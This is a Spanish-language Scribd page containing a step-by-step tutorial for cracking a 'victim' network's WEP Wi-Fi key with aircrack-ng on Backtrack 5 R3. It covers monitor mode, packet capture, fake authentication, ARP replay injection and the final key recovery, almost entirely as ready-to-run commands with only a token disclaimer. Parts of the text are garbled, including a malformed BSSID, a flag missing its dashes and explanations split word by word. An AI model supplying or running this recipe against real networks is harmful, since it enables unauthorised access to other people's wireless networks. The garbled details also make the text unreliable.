0% encontró este documento útil (0 votos)
327 vistas3 páginas

Backtrack 5 R3

1) El documento describe los pasos para usar Backtrack 5 R3 para descifrar las claves wifi usando aircrack-ng. Primero se pone la tarjeta de red en modo monitor y se escanean las redes disponibles. Luego se capturan paquetes de la red objetivo y se inyectan más paquetes hasta alcanzar 30,000 paquetes de datos. Finalmente, se usa aircrack-ng para descifrar la clave wifi a partir de los paquetes capturados.
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
327 vistas3 páginas

Backtrack 5 R3

1) El documento describe los pasos para usar Backtrack 5 R3 para descifrar las claves wifi usando aircrack-ng. Primero se pone la tarjeta de red en modo monitor y se escanean las redes disponibles. Luego se capturan paquetes de la red objetivo y se inyectan más paquetes hasta alcanzar 30,000 paquetes de datos. Finalmente, se usa aircrack-ng para descifrar la clave wifi a partir de los paquetes capturados.
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd
Está en la página 1/ 3

Backtrack 5 R3

Este Post es con fines educativos y/o didcticos, no me hago responsable del uso malicioso
Ya apenas se utiliza este tipo de clave para redes wifi ya que la clave es facil de desencriptar, pero voy
a hacer un tutorial de como es el proceso.
PD: Si instalamos este sistema operativo en el VirtualBox a menos que utilicemos una tarjeta de de
red wifi USB no se podra realizar la practica, ya que el programa no reconoce las tarjetas de red
internas, y al ver las tarjetas de red la captura obtenida en la terminal sera esta

Lo primero introducimos el cd en el lector y arrancar el PC desde el lector. Tambien se podria hacer el


modo live desde un USB.

elegimos la primera opcin y dejar que continue.


Cuando veamos lo mismo que en la captura de abajo, escribimos el comandostartx y se iniciara el SO

Una vez iniciado el SO, abrimos un terminal.


Lo primero es saber el nombre de nuestra interface (Tarjeta Wireless) para ponerla en modo monitor,
para esto escribimos lo siguiente en el terminal:
airmon-ng
Y nos aparecer el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el nombre de
la interfaz es Wlan0
1* Ya qu conocemos el nombre de nuestra interfaz procedemos a ponerla en modo monitor y
escribimos lo siguiente:
airmon-ng

start

wlan0

Ya tenemos nuestra tarjeta en modo monitor (monitor mode enabled on mon0) y como se podrn dar
cuenta mon0 es el nombre de la interfaz en modo monitor.
2* Ahora vamos a escanear redes disponibles con el siguiente comando:
airodump-ng mon0
y con esto comenzar a mostrarnos las redes disponibles. Para seleccionar la red vctima tenemos qu
detener el escaneo presionando ctrl+c
3* En este paso vamos a capturar la red vctima para esto escribimos el siguiente comando:
airodump-ng -w redes -c 11 bssid 00:22:A4:30E:59 mon0

donde
-w =
especifica
el
nombre
del
archivo
donde
se
guarda
-c =
especifica
el
canal
de
bssid =
especifica
Mac
de
punto
mon0 = especifica la interfaz de la tarjeta de red en modo monitor

la

captura
la
de

de

datos
red
acceso

4* Abrimos un segundo terminal (sin cerrar la primera) y escribimos lo siguiente:


aireplay-ng -1 0 -a 00:22:A4:30E:59 mon0
esto es para asociar su pc con la red vctima
5* Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente:
aireplay-ng -3 -b 00:22:A4:30E:59 mon0
con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se
incrementar rapidamente, y esperamos a que llegue a los 30,000 datos para poder desencriptar la
Clave
6* Cuando llegue a los 30,000 datos abrimos una tercera y ltima terminal y escribimos el famoso
comando:
aircrack-ng redes-01.cap
redes = archivo donde se guarda la captura (.cap) el mismo qu mencionamos en el paso 3*
damos enter y empezar a descifrar a la clave y ya est la clave desencriptada
Key Found (09:86:23:47:63)

También podría gustarte